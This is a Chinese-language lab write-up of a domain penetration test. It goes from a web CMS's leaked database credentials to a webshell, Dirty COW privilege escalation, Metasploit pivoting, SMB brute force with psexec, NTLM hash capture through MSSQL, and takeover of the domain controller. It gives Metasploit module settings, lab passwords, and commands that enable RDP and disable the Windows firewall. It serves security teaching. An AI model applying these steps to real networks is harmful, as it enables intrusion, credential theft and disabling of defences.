记一次曲折的域渗透

记一次曲折的域渗透

0x01 环境信息

配置信息

centos

IP1:192.168.1.132

IP2:192.168.93.100

应用:web

ubuntu

IP:192.168.93.120

Win server2012

IP:192.168.93.10

Win server2008

IP:192.168.93.20

Win 7

IP:192.168.93.30

kali

IP:192.168.1.128

0x02 WEB渗透

2.1 端口扫描

192.168.1.132

image.png

发现存在80端口,访问发现网站

image.png

2.2 目录扫描

发现1.php文件是phpinfo

image.png

README中找到版本信息

image.png

发现configuration.php文件

image.png

发现该文件泄漏的数据库用户名和密码,以及数据库名等信息

image.png

2.3 后台登陆

3306端口开放,尝试远程登录目标mysql

在am2zu_users中找到用户名密码文件

image.png

根据官网给出的加盐密码可以创建一个用户

image.png

这里创建一个admin123的用户密码是admin

image.png

成功登陆到后台

image.png

2.4 Getshell

后台发现修改文件内容

image.png

写入一句话,位置templates/beez3/index.php

连接一句话

image.png

2.5 绕过disable

连接后发现不能执行命令,查看disable_funtions

image.png

利用蚁剑绕过disable

image.png

发现真实WEB服务IP地址为192.168.93.120

而centos则是提供反向代理的Nginx服务器192.168.93.100

image.png

在mysql中发现用户名密码

image.png

2.6 远程登录

ssh远程登录、查看内核和ip

image.png

登录后是低权限用户,使用脏牛提权

image.png

查看用户权限

image.png

0x03 后渗透

3.1 上线msf

image.png

image.png

image.png

添加内网路由

image.png

新建一个socket代理

image.png

3.2 内网扫描

image.png

3.3 win7(192.168.93.30)

image.png

开放了445端口,这里尝试使用scanner模块SMB远程登陆爆破

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.30
set PASS_FILE /root/Desktop/SMB.txt
set SMBUSER administrator

image.png

这里爆破出密码123qwe!ASD

**PSEXEC****传递**

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.93.30
set smbuser administrator
set smbpass 123qwe!ASD

image.png

信息收集

image.png
这里拿到win7权限没有发现有用的信息

3.4 win2008(192.168.93.20)

image.png

这里可以看到开放了1433端口

使用之前得到的mssql数据库密码可以登陆

image.png

使用Responder.py来伪造smb服务器来获取hash,然后利用mssql来进行触发验证

使用auxiliary/admin/mssql/mssql_ntlm_stealer,执行xp_dirtree,触发UNC

最后使用john破解密码

image.png

使用vmiexec获取命令行

image.png

开启3389

设置远程桌面端口

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

开启远程桌面

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

检查端口状态

netstat -an|find "3389"

关闭远程桌面

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

image.png

远程登陆,并上传一个正向监听

image.png

成功上线

image.png

首先提权到SYSTEM

image.png

kiwi和hashdump查看凭证

获得域用户Administrator的密码为zxcASDqw123!!

image.png

3.5 Win2012-域控(192.168.93.10)

取得密码这里直接wmiexec获取cmd

image.png

开启3389

image.png

关闭防火墙

netsh firewall set opmode mode=disable #此处使用这条成功关闭防火墙
netsh advfirewall set allprofiles state off

image.png

使用windows登陆最终拿下域控,最后做一下迁移和域信息收集

image.png

  • 发表于 2022-05-27 14:24:02
  • 阅读 ( 7078 )
  • 分类:漏洞分析

0 条评论

请先 登录 后评论
山石网科安研院
山石网科安研院

7 篇文章

站长统计